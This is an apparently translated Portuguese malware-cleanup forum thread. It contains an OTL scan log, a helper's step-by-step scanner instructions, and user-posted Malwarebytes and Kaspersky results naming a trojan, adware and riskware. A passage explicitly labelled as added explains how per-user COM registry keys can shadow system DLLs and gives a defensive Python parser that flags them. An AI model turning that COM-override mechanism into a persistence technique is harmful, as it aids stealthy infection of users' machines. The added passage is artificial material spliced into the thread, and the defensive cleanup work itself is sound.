O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O20 - HKCU Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2013/12/05 18:18:31 | 000,000,000 | ---D | C] -- C:\LinhaDefensiva

[2013/12/05 18:17:11 | 000,178,597 | ---- | C] (Igor Pavlov) -- C:\Users\2011\Desktop\bankerfix.exe

[2013/12/05 01:14:53 | 004,240,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/12/05 01:14:53 | 002,724,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/12/05 01:14:53 | 001,926,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl

[2013/12/05 01:14:53 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll

[2013/12/05 01:14:53 | 000,703,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll

[2013/12/05 01:14:53 | 000,646,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe

[2013/12/05 01:14:53 | 000,645,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsIntl.dll

[2013/12/05 01:14:53 | 000,616,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dat

[2013/12/05 01:14:53 | 000,553,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll

[2013/12/05 01:14:53 | 000,523,776 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/12/05 01:14:53 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/12/05 01:14:53 | 000,367,104 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll

[2013/12/05 01:14:53 | 000,337,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\html.iec

[2013/12/05 01:14:53 | 000,244,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll

[2013/12/05 01:14:53 | 000,238,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll

[2013/12/05 01:14:53 | 000,233,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\url.dll

[2013/12/05 01:14:53 | 000,208,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/12/05 01:14:53 | 000,194,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\elshyph.dll

[2013/12/05 01:14:53 | 000,182,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msls31.dll

[2013/12/05 01:14:53 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll

[2013/12/05 01:14:53 | 000,151,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iexpress.exe

[2013/12/05 01:14:53 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\wextract.exe

[2013/12/05 01:14:53 | 000,116,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iepeers.dll

[2013/12/05 01:14:53 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe

[2013/12/05 01:14:53 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\IEAdvpack.dll

[2013/12/05 01:14:53 | 000,108,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe

[2013/12/05 01:14:53 | 000,086,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/12/05 01:14:53 | 000,083,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\inseng.dll

[2013/12/05 01:14:53 | 000,074,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SetIEInstalledDate.exe

[2013/12/05 01:14:53 | 000,071,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/12/05 01:14:53 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll

[2013/12/05 01:14:53 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/12/05 01:14:53 | 000,056,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\pngfilt.dll

[2013/12/05 01:14:53 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll

[2013/12/05 01:14:53 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\mshtmler.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeedsbs.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/12/05 01:14:53 | 000,036,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\imgutil.dll

[2013/12/05 01:14:53 | 000,034,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll

[2013/12/05 01:14:53 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/12/05 01:14:53 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\licmgr10.dll

[2013/12/05 01:14:53 | 000,012,800 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\msfeedssync.exe

[2013/12/05 01:14:53 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll

[2013/12/04 20:43:51 | 000,000,000 | ---D | C] -- C:\_OTL

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/12 23:25:21 | 001,796,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\authui.dll

[2013/11/12 23:25:21 | 000,152,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\SmartcardCredentialProvider.dll

[2013/11/12 23:25:15 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\ncrypt.dll

[2013/11/12 23:25:14 | 000,015,872 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\sspisrv.dll

[2013/11/12 23:25:10 | 000,216,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\FWPUCLNT.DLL

[2013/11/12 23:25:09 | 000,656,896 | ---- | C] (Microsoft Corporation) -- C:\Windows\System32\nshwfp.dll

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/12/08 12:22:59 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/12/08 12:22:49 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/12/08 12:22:45 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/12/08 12:05:00 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/12/08 11:55:00 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/12/07 22:55:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/12/07 17:02:22 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/12/07 17:02:22 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/12/05 18:17:13 | 000,178,597 | ---- | M] (Igor Pavlov) -- C:\Users\2011\Desktop\bankerfix.exe

[2013/12/05 01:14:53 | 004,240,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jscript9.dll

[2013/12/05 01:14:53 | 002,724,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtml.tlb

[2013/12/05 01:14:53 | 001,926,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\inetcpl.cpl

[2013/12/05 01:14:53 | 001,051,136 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtmlmedia.dll

[2013/12/05 01:14:53 | 000,703,488 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dll

[2013/12/05 01:14:53 | 000,646,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\MsSpellCheckingFacility.exe

[2013/12/05 01:14:53 | 000,645,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jsIntl.dll

[2013/12/05 01:14:53 | 000,616,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieapfltr.dat

[2013/12/05 01:14:53 | 000,553,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jscript9diag.dll

[2013/12/05 01:14:53 | 000,523,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeeds.dll

[2013/12/05 01:14:53 | 000,440,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieui.dll

[2013/12/05 01:14:53 | 000,367,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dxtmsft.dll

[2013/12/05 01:14:53 | 000,337,408 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\html.iec

[2013/12/05 01:14:53 | 000,244,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\dxtrans.dll

[2013/12/05 01:14:53 | 000,238,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iedkcs32.dll

[2013/12/05 01:14:53 | 000,233,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\url.dll

[2013/12/05 01:14:53 | 000,208,896 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ie4uinit.exe

[2013/12/05 01:14:53 | 000,194,048 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\elshyph.dll

[2013/12/05 01:14:53 | 000,182,272 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msls31.dll

[2013/12/05 01:14:53 | 000,164,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msrating.dll

[2013/12/05 01:14:53 | 000,151,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iexpress.exe

[2013/12/05 01:14:53 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\wextract.exe

[2013/12/05 01:14:53 | 000,116,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iepeers.dll

[2013/12/05 01:14:53 | 000,112,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieUnatt.exe

[2013/12/05 01:14:53 | 000,111,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\IEAdvpack.dll

[2013/12/05 01:14:53 | 000,108,032 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollector.exe

[2013/12/05 01:14:53 | 000,086,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iesysprep.dll

[2013/12/05 01:14:53 | 000,083,456 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\inseng.dll

[2013/12/05 01:14:53 | 000,074,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\SetIEInstalledDate.exe

[2013/12/05 01:14:53 | 000,071,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\RegisterIEPKEYs.exe

[2013/12/05 01:14:53 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\MshtmlDac.dll

[2013/12/05 01:14:53 | 000,061,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iesetup.dll

[2013/12/05 01:14:53 | 000,056,832 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\pngfilt.dll

[2013/12/05 01:14:53 | 000,051,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwproxystub.dll

[2013/12/05 01:14:53 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\mshtmler.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeedsbs.dll

[2013/12/05 01:14:53 | 000,043,008 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\jsproxy.dll

[2013/12/05 01:14:53 | 000,036,352 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\imgutil.dll

[2013/12/05 01:14:53 | 000,034,816 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\JavaScriptCollectionAgent.dll

[2013/12/05 01:14:53 | 000,032,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\iernonce.dll

[2013/12/05 01:14:53 | 000,024,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\licmgr10.dll

[2013/12/05 01:14:53 | 000,016,284 | ---- | M] () -- C:\Windows\System32\ieuinit.inf

[2013/12/05 01:14:53 | 000,012,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\msfeedssync.exe

[2013/12/05 01:14:53 | 000,004,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\ieetwcollectorres.dll

[2013/11/30 13:50:57 | 000,139,264 | ---- | M] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/12/05 01:14:53 | 000,016,284 | ---- | C] () -- C:\Windows\System32\ieuinit.inf

[2013/11/30 13:50:46 | 000,139,264 | ---- | C] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

< End of report >

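The "ZeroAccess Check" block at the end of the OTL report above lists InProcServer32 keys for a few system COM classes under both HKEY_CURRENT_USER and HKEY_LOCAL_MACHINE. COM class lookups consult HKCU\Software\Classes before HKLM\Software\Classes, so a per-user InProcServer32 key for a system class can silently replace the machine-wide DLL; that is why the OTL check exists and why such keys deserve a manual look. The script below is an added example, not part of the thread or of OTL: it parses a block in the shape OTL prints (the sample is constructed from the lines in the log above) and lists which CLSIDs have a user-hive InProcServer32 key at all, together with the server DLL each hive points to.

```python
import re

# Constructed sample in the shape of OTL's "ZeroAccess Check" section
# (keys and paths copied from the report posted above).
SAMPLE_LOG = r"""
========== ZeroAccess Check ==========
[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
< End of report >
"""

# Assumed line shapes, taken from the report above: a bracketed key line,
# a '"" = <dll> -- [...]' default-value line and a '"ThreadingModel" = X' line.
KEY_RE = re.compile(
    r"^\[(HKEY_CURRENT_USER|HKEY_LOCAL_MACHINE)\\Software\\Classes\\clsid\\"
    r"(\{[0-9A-Fa-f-]+\})\\InProcServer32\]$")
DEFAULT_RE = re.compile(r'^"" = (.+?) -- \[')
THREADING_RE = re.compile(r'^"ThreadingModel" = (\w+)$')


def parse_zeroaccess_block(text):
    """Map each CLSID (lower-cased) to the hives in which OTL listed an
    InProcServer32 key: {clsid: {"HKCU"|"HKLM": {"server": ..., "threading": ...}}}.
    A hive entry with server None means the key was listed without a default value."""
    entries = {}
    current = None  # (hive, clsid) of the key whose value lines follow
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            hive = "HKCU" if key.group(1) == "HKEY_CURRENT_USER" else "HKLM"
            clsid = key.group(2).lower()
            entries.setdefault(clsid, {})[hive] = {"server": None, "threading": None}
            current = (hive, clsid)
            continue
        if current is None:
            continue
        hive, clsid = current
        default = DEFAULT_RE.match(line)
        if default:
            entries[clsid][hive]["server"] = default.group(1)
            continue
        threading = THREADING_RE.match(line)
        if threading:
            entries[clsid][hive]["threading"] = threading.group(1)
    return entries


def find_user_overrides(entries):
    """CLSIDs that carry an InProcServer32 key in the user hive. HKCU\\Software\\Classes
    takes precedence over HKLM\\Software\\Classes, so each of these shadows the system
    DLL for that class and should be inspected by hand (and compared with its HKLM twin)."""
    return sorted(clsid for clsid, hives in entries.items() if "HKCU" in hives)


def describe(entries):
    """Human-readable lines: one per CLSID, showing both hives' servers."""
    lines = []
    for clsid in sorted(entries):
        hives = entries[clsid]
        hkcu = hives.get("HKCU", {}).get("server")
        hklm = hives.get("HKLM", {}).get("server")
        flag = "USER-HIVE KEY PRESENT" if "HKCU" in hives else "ok"
        lines.append(f"{clsid}  HKCU={hkcu}  HKLM={hklm}  [{flag}]")
    return lines


if __name__ == "__main__":
    parsed = parse_zeroaccess_block(SAMPLE_LOG)
    for line in describe(parsed):
        print(line)
    print("review:", find_user_overrides(parsed))
```

On the report above the two HKCU keys are listed with no default value at all, so the script reports their server as None; that is still worth a look in the registry, since a legitimate per-user registration of a shell32 or WMI class is rare.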

Dear manoelvalerio

Reinstall Firefox and Chrome ;)

Then do the following:

Download Malwarebytes Anti-Malware:

  • Link1
  • Alternative link
    • Double-click mbam-setup.exe, choose the language and follow the instructions to install the software.
    • Make sure the boxes Update Malwarebytes Anti-Malware and Launch Malwarebytes Anti-Malware are checked, and click Finish.
    • If there are updates, they will be downloaded and installed.
    • When the updates finish, a program window will open. Select "Quick Scan" and then click the Scan button.
    • The scan will start and may take a while. Please be patient.
    • When the scan is complete, click OK, then Show Results to view the log.
    • If anything is found, make sure everything is checked and click Remove.
    • When disinfection finishes, a log will automatically open in a Notepad document and you may be asked to restart the PC. (Read the note.)
    • The log is saved automatically and can be viewed by clicking the Logs tab in the main menu.
    • Copy and paste the contents of that log in your next reply.

Note: In more complicated infections, a restart may be required. If you are asked to restart, please do so immediately.

Regards :D


Good afternoon Diego!

Sorry for the delay.

I reinstalled Chrome and only uninstalled Firefox (I wasn't using it).

Below is the Malwarebytes log.

Regards!

----------------------------------

Malwarebytes Anti-Malware 1.75.0.1300

www.malwarebytes.org

Versão da Base de Dados: v2013.12.15.03

Windows 7 Service Pack 1 x86 NTFS

Internet Explorer 11.0.9600.16476

2011 :: 2011_PC [administrador]

15/12/2013 12:51:31

mbam-log-2013-12-15 (12-51-31).txt

Tipo de Verificação: Verificação Rápida

Opções de verificações ativadas: Memória | Inicialização | Registro | Sistema de arquivos | Heurística/Extra | Heurística/Shuriken | PUP | PUM

Opções de verificação desativadas: P2P

Objetos escaneados: 194298

Tempo decorrido: 5 minuto(s), 53 segundo(s)

Processos de Memória Detectados: 0

(Não foram detectados ítens maliciosos)

Módulos de Memória Detectados: 0

(Não foram detectados ítens maliciosos)

Chaves de Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Valores de Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Itens de Dados no Registro Detectadas: 0

(Não foram detectados ítens maliciosos)

Pastas Detectadas: 0

(Não foram detectados ítens maliciosos)

Arquivos Detectados: 2

C:\Users\2011\Programas\DTLite4454-0316.exe (PUP.Optional.OpenCandy) -> Enviado para a Quarentena e deletado com sucesso.

C:\Windows\KMService.exe (RiskWare.Tool.CK) -> Enviado para a Quarentena e deletado com sucesso.

(fim)


Dear manoelvalerio

# Step 1 #

Download the Kaspersky AVP Tool from one of these links:

Alternative 1

Alternative 2

  • You will be taken to a Kaspersky page asking for an e-mail address for registration, a first name and a last name.
  • Only the "email" field is required.
  • Enter your e-mail and then click the Submit Form button.
  • The page will reload. Click the Download button.
  • Save it to your desktop.
  • Run the file and wait for the installation.
    • ** Windows Vista and Windows 7 users: right-click the file, then click Run as administrator

  • On the license agreement screen, check the option I accept the license agreement and then click the Start button.
  • The program will appear to freeze and nothing happens. This is normal; just wait until the program's main screen appears, then click the Settings icon:

[image: KRT_settings.png]

On this screen, check the box next to:

  • My Computer;
  • Local Disk (C:);
  • Also check any other drives listed below Local Disk, if there are any;
  • Then click the Automatic Scan tab.

[image: KRT_install2_.png]

  • Back on the program's main screen, click the Start scanning button;
  • Be patient, it takes a while;
  • When it finishes, if anything was detected, the program will ask you what to do;
  • Check the box next to Apply to all objects and then click Skip (we only want the log).

[image: KRT_detection_.png]

Once the scan has finished, proceed as follows:

  1. On the main screen, if anything was detected, save the log.
  2. If you close the program and forget to save the log, you will have to repeat the whole scan.
  3. To save the log, click the Reports icon (next to the "Settings" icon).
  4. In the next window, click Detected Threats, then click the floppy-disk icon to save the log.
  5. Choose an easily accessible location and save it as log.txt
  6. Copy the entire contents of that Notepad file and paste it in your next reply.
  7. If nothing is detected, you do not need to save the log; just let me know.
  8. To exit the program, just click the X in the top right corner.

Notes:
While the scan is running, the main screen shows a progress bar. When it finishes, the program shows the status as completed and a button that will be orange if nothing was detected, and red if something was found. If something was detected, the program will also show an alert screen warning that your system is unprotected and suggesting a Kaspersky product. Click the No, thanks button.

# Step 2 #

Download SecurityCheck and save it to your Desktop

  • Double-click SecurityCheck.exe
    • Attention: Windows Vista, 7 and 8 users, right-click and choose: [image: execadmin.png]

  • Press any key to continue... a report will open
  • Copy its entire contents and paste it in your next reply

Regards :D


Hello Diego.

Here are the requested logs: the 1st from Kaspersky and the 2nd from Security Check.

Thank you!!!

=-------------

Status: Detected (events: 6)

16/12/2013 09:38:35 Detected Trojan program Trojan.Win32.Staser.fv C:\AdwCleaner\Quarantine\C\ProgramData\eSafe\eGdpSvc.exe.vir High

16/12/2013 10:00:44 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Documents and Settings\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//data0002.res Medium

16/12/2013 10:14:10 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Users\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//data0002.res Medium

16/12/2013 10:19:40 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Users\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//# Medium

16/12/2013 10:19:40 Detected adware not-a-virus:AdWare.Win32.Hao123.a C:\Documents and Settings\2011\Programas\FFSetup3.1.1.exe//hao123inst-egypt.exe//# Medium

